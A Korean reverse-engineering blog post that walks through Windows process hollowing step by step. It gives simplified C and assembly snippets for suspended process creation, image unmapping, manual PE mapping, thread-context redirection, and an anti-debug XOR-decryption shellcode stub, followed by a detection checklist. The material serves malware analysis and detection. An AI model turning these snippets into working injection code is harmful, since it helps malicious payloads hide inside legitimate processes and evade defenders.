Windows Process Hollowing의 내부 제어 흐름 및 스택/레지스터 변화 분석

악성코드에서 광범위하게 사용되는 Process Hollowing의 내부 동작을 리버싱 관점에서 단계별로 분석함.

리버싱 기록

---

1. Process Hollowing 개요

Process Hollowing은 다음과 같은 고전적 인젝션 절차를 따름:

1. 정상 프로세스를 Suspended 상태로 생성
2. 생성된 프로세스의 메모리 영역(Unmap Section) 비우기
3. 악성 페이로드의 PE 헤더 및 섹션을 새 주소 공간에 수동 매핑
4. 프로세스 스레드 컨텍스트(EIP/RIP) 를 새로운 Entry Point로 변경
5. 스레드 재개

이 방식의 장점:

• 외부에서 보면 정상 프로세스 이름을 유지
• IAT 후킹·DLL Injection보다 탐지 지점이 적음
• 이미지 경로/명령줄/서명 모두 정상으로 보임

---

2. Suspended 프로세스 생성 (C)

// 비실행 개념 코드 — Suspended Process 생성
STARTUPINFOA si = {0};
PROCESS_INFORMATION pi = {0};

CreateProcessA(
    "C:\\Windows\\System32\\notepad.exe",
    NULL,
    NULL,
    NULL,
    FALSE,
    CREATE_SUSPENDED,
    NULL,
    NULL,
    &si,
    &pi
);

분석 포인트:

• CREATE_SUSPENDED 플래그로 새 스레드가 실행되기 전에 컨텍스트를 추출 가능
• pi.hThread → CONTEXT 구조 확인
• 악성코드는 이후 GetThreadContext로 레지스터 값을 읽어 진입점 조작에 사용

---

3. 원본 이미지 제거(Unmap) Assembly 예시

실제 샘플은 NtUnmapViewOfSection을 동적 API 획득으로 호출하는 경우가 많음.

; 호출 전: EAX → 함수 주소, ECX/EDX → 파라미터
; 예시
push    processHandle
push    baseAddress
call    eax                     ; eax = NtUnmapViewOfSection

; 반환값 확인
test    eax, eax
jnz     UNMAP_FAILED

레지스터 흐름 관찰 포인트:

• call eax 패턴은 동적 API 해석 루틴이 성공적으로 주소를 찾은 뒤 사용
• baseAddress는 PEB의 ImageBaseAddress 또는 컨텍스트 Ebx/ Rdx 등에서 획득

---

4. 악성 이미지 매핑 — 수동 PE 로딩(C)

아래 코드는 구조 설명을 위해 단순화한 예시.

// 개념적 매핑 구조
LPVOID remoteBase = VirtualAllocEx(
    pi.hProcess,
    (LPVOID)payloadImageBase,
    payloadSize,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_EXECUTE_READWRITE
);

// PE Header 복사
WriteProcessMemory(
    pi.hProcess,
    remoteBase,
    payloadBuffer,
    payloadHeadersSize,
    NULL
);

// Section 루프 복사
for (int i=0; i<sectionCount; i++) {
    WriteProcessMemory(
        pi.hProcess,
        (LPVOID)((SIZE_T)remoteBase + section[i].VirtualAddress),
        payloadBuffer + section[i].PointerToRawData,
        section[i].SizeOfRawData,
        NULL
    );
}

분석 관점:

• 인젝션 페이로드가 “file-backed image”가 아닌 “memory-backed image”이므로
  모듈 리스트에 표시되지 않아 탐지가 어려움
• PE 구조 파싱(이미지베이스, 섹션 RVA, 정렬 값)이 정확히 일치해야 정상 작동

---

5. 진입점(EIP/RIP) 재설정 — CONTEXT 변조

// 비실행 예시 — Entry Point 변경
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_FULL;

GetThreadContext(pi.hThread, &ctx);

// x86
ctx.Eip = (DWORD)((SIZE_T)remoteBase + payloadEntryRVA);

// x64
// ctx.Rip = ...

SetThreadContext(pi.hThread, &ctx);

레지스터 변화 관찰:

• GetThreadContext 후 EIP/RIP 값은 원래 notepad.exe의 Entry Point
• 악성코드가 이 값을 새로운 PE Entry Address로 변경
• 이후 ResumeThread로 실행되는 스레드는 완전히 다른 코드 흐름 수행

---

6. Shellcode Pre-Staging 패턴(Assembly)

일부 악성코드는 신뢰도 향상을 위해 Entry Point에 Shellcode Stub을 두고
그 Stub 안에서 추가 환경 체크 및 Anti-Debug 수행 후 메인 페이로드로 점프함.

; 비실행 예시 — Shellcode Stub
SHELL_STUB:
    pushad
    pushfd

    mov     eax, fs:[0x30]          ; PEB
    mov     al, [eax+0x02]          ; BeingDebugged
    test    al, al
    jnz     DEBUG_PATH

    ; 간단한 XOR 복호화 루틴
    mov     esi, [encryptedPayload]
    mov     ecx, payloadSize
XOR_LOOP:
    xor     byte ptr [esi], 0x5A
    inc     esi
    loop    XOR_LOOP

    popfd
    popad
    jmp     DECRYPTED_ENTRY

요점:

• Shellcode는 매우 작은 공간에서 환경 체크 + 복호화 + 점프까지 처리
• PEB BeingDebugged 플래그 확인 → 악성코드의 고전적 anti-debug 루틴
• XOR decrypt 루프는 스택/레지스터 조작 없이 간단하게 구현되는 패턴

---

7. “Hollowing Signature” 탐지 체크리스트

실제 Process Hollowing을 판별하는 주요 지표는 다음과 같음.

구분	탐지 지표
프로세스 구조	Suspended 상태에서 시작됨
메모리 매핑	ImageBaseAddress가 원본과 불일치
섹션 검사	PE 섹션이 파일과 메모리에서 다르게 나타남
쓰기 패턴	큰 연속 WriteProcessMemory 호출 흔적
스레드 컨텍스트	Entry Point 레지스터(EIP/RIP)가 정상 이미지 범위 외부
모듈 리스트	로드된 이미지가 정상 EXE지만 내부 코드는 다른 바이너리

---

8. 제어 흐름 요약 (전체 플로우)

1. CreateProcessA(..., CREATE_SUSPENDED)
2. GetThreadContext → EIP/RIP 추출
3. NtUnmapViewOfSection로 원본 이미지 제거
4. VirtualAllocEx로 새로운 ImageBase 확보
5. 헤더 및 섹션 수동 매핑 (PE 구조 기반)
6. EntryPoint를 새 주소로 SetThreadContext
7. ResumeThread로 실행 흐름 전환
8. Shellcode Stub → Anti-debug → 복호화 → 메인 실행

모든 단계를 통해 정상 프로세스가 완전히 다른 바이너리로 “속이 비워지고 교체”됨.

---

✨ 마무리 한 줄

Process Hollowing은 “프로세스를 실행하지 않고 먼저 빌려온 뒤 내부를 완전히 교체하는 방식”이며,
이 미세한 교체 과정 속 레지스터/메모리의 작은 변화를 읽어내는 능력이 핵심 역량으로 이어진다.

---

📍 Written by Code & Compass